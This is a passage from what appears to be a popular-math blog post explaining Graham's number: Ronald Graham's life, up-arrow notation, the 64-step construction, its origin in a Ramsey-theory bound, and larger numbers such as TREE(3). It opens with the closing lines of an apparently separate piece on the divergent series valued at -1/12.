It is also seen in computing the Casimir force for a scalar field in one dimension. I'm not familiar with how exactly this works, but the result is a constant of \(-\frac{1}{12}\).

This is just one of many divergent series that are useful in science. It is also a great example of a non-intuitive result in math. I still can't fathom how this trickery works. An infinitely increasing sum should be infinitely increasing right? So how can we assign a value to it?

What's the biggest number you can think of? A million? A billion? The number of atoms in the observable universe (roughly \(10^{80}\))? Whatever you're imagining, I promise you it's basically zero compared to Graham's number—a number so incomprehensibly vast that it broke mathematics' ability to write things down.

For a while, Graham's number held the Guinness World Record as the largest number ever used in a serious mathematical proof. That title has since been claimed by even more mind-melting numbers (more on that later), but Graham's number remains legendary—a monument to just how weird infinity-adjacent mathematics can get.

Meet Ronald Graham: The Juggling Mathematician

Before we dive into the number, let's meet its creator. Ronald Graham (1935–2020) wasn't your typical mathematician. Sure, he was one of the most influential figures in discrete mathematics, working at Bell Labs for 37 years and publishing around 400 papers. But he was also a professional trampolinist who performed in a circus act called "The Bouncing Baers" to pay his way through graduate school.^[1]

Graham was also president of the International Jugglers' Association and could juggle up to six balls. His office ceiling at UC San Diego had a large net he could lower and attach to his waist—so when practicing with six or seven balls, any drops would roll right back to him. As he liked to say: "Juggling is a metaphor for doing more things than you have hands to do."^[2]

When asked about his namesake number, Graham called it "kind of a joke"—he stumbled upon it while proving a combinatorial theorem using recursive multiple inductions. "When that happens," he explained, "you tend to get large numbers."^[3] Understatement of the century.

The Black Hole Problem

Here's a fact that still gives me chills. According to Numberphile:

If you were to try to memorize each digit of Graham's number, your head would sooner turn into a black hole before you were done. This happens because a black hole the size of your head stores less information than what it would take to store all of the digits of Graham's number.

Read that again. Your brain would literally collapse into a black hole before you could memorize this number. This isn't hyperbole—it's a consequence of the Bekenstein bound, which limits how much information can be stored in a finite region of space.

How do we define Graham's number?

We can't use ordinary notation—there simply isn't enough paper in the universe. Instead, we'll use Knuth's up-arrow notation, a system designed for expressing hyperoperations. If you haven't seen it before, I wrote about it here.

To build Graham's number, we start at level 1:

$$ G_1 = 3\uparrow\uparrow\uparrow\uparrow 3 $$

Those four arrows represent hexation—a hyperoperation so powerful that it makes exponentiation look like addition. Let's build up to it step by step.

Exponentiation: \(3\uparrow3\)

No big deal:

$$ 3\uparrow3 = 3^3 = 27 $$

Tetration: \(3\uparrow\uparrow3\)

This is a power tower—exponents stacked on exponents:

$$ 3\uparrow\uparrow3 = 3^{3^3} = 3^{27} = 7{,}625{,}597{,}484{,}987 $$

We're already at 7.6 trillion. Things are heating up.

Pentation: \(3\uparrow\uparrow\uparrow3\)

Pentation is iterated tetration—a tower of power towers:

$$ 3\uparrow\uparrow\uparrow3 = 3\uparrow\uparrow(3\uparrow\uparrow3) = 3\uparrow\uparrow(7{,}625{,}597{,}484{,}987) $$

This means a power tower of 3s that is 7.6 trillion levels tall:

$$ \left.\begin{aligned} 3^{3^{3^{3^{⋰^{3}}}}} \end{aligned}\right\} \text{ height = 7,625,597,484,987} $$

Stop and think about this. Just counting each 3 in this tower out loud would take tens of thousands of years. And we can't write this number down—there aren't enough particles in the observable universe ($10^{80}$) to represent each digit.

Hexation: \(3\uparrow\uparrow\uparrow\uparrow 3\)

Hexation is iterated pentation. The result of one pentation tower determines how many more towers to compute:

$$ 3\uparrow\uparrow\uparrow\uparrow3 = 3\uparrow\uparrow\uparrow(3\uparrow\uparrow\uparrow3) $$

This creates a cascading sequence of incomprehensible growth:

This monstrous result is \(G_1\).

Building Graham's Number

Now here's where it gets truly insane. We use \(G_1\) to define the number of arrows for \(G_2\):

$$ G_2 = \underbrace{3\uparrow\uparrow \cdots \uparrow\uparrow 3}_{G_1 \text{ arrows}} $$

Remember: each additional arrow creates an explosion in size. Going from 4 arrows to 5 arrows is incomprehensibly more powerful than going from 3 to 4. And \(G_1\) already has a number of arrows we can't even write down.

Then \(G_2\) becomes the number of arrows for \(G_3\):

$$ G_3 = \underbrace{3\uparrow\uparrow \cdots \uparrow\uparrow 3}_{G_2 \text{ arrows}} $$

This keeps going: \(G_4\), \(G_5\), \(G_6\)... each one using the previous result as its number of arrows.

Graham's number is \(G_{64}\).

$$ G_{64} = \underbrace{3\uparrow\uparrow \cdots \uparrow\uparrow 3}_{G_{63} \text{ arrows}} $$

We iterate this process sixty-four times.

Why Does This Number Exist? Ramsey Theory

Graham's number isn't mathematical showboating—it emerged from a real problem in Ramsey theory:

Connect each pair of geometric vertices of an n-dimensional hypercube to obtain a complete graph on \(2^n\) vertices. Color each edge either red or blue. What is the smallest value of n for which every such coloring contains at least one single-colored complete subgraph on four coplanar vertices?

In 1971, Ronald Graham and Bruce Rothschild proved that a solution exists with an upper bound equal to Graham's number. The actual answer is believed to be much smaller—somewhere between 13 and \(2\uparrow\uparrow\uparrow6\) (proven in 2014)—but Graham's number was a legitimate bound.^[4]

In 1980, the Guinness Book of World Records recognized it as the largest number ever used in a serious mathematical proof.

What We Actually Know About Graham's Number

We can't compute Graham's number, but we can determine some of its properties. Remarkably, we know its last 500 digits:

...02425950695064738395657479136519351798334535362521430035401260267716226721604198106522631693551887803881448314065252616878509555264605107117200099709291249544378887496062882911725063001303622934916080254594614945788714278323508292421020918258967535604308699380168924988926809951016905591995119502788717830837018340236474548882222161573228010132974509273445945043433009010969280253527518332898844615089404248265018193851562535796399618993967905496638003222348723967018485186439059104575627262464195387

I find it delightful that we can know the ending of a number whose full representation exceeds the information capacity of the observable universe.

Where Graham's Number Sits

In the fast-growing hierarchy, Graham's number sits around:

$$ \text{Graham's Number} < f_{\omega+1}(64) $$

But Wait—There Are Even Bigger Numbers

Graham's number is famous, but it's been utterly eclipsed. TREE(3), arising from a problem about trees in graph theory, is so much larger that Graham's number is essentially zero by comparison.^[5]

How much larger? Consider this: even if you computed \(G_{G_{G_{...}}}\) with Graham's number levels of nesting, you'd still be nowhere close to TREE(3). It exists in an entirely different realm of magnitude. And SSCG(3) is larger still—much larger than TREE(TREE(...TREE(3)...)) nested TREE(3) times.^[6]

The rabbit hole goes infinitely deep.

Learn More

Numberphile has an excellent video on Graham's number that I highly recommend:

1. MacTutor: Ronald Graham Biography ↩︎
2. UC San Diego: Ron Graham Obituary ↩︎
3. Simons Foundation: Ronald Graham Profile ↩︎
4. Wikipedia: Graham's Number ↩︎
5. Wait But Why: From 1,000,000 to Graham's Number ↩︎
6. Googology Wiki: TREE Sequence ↩︎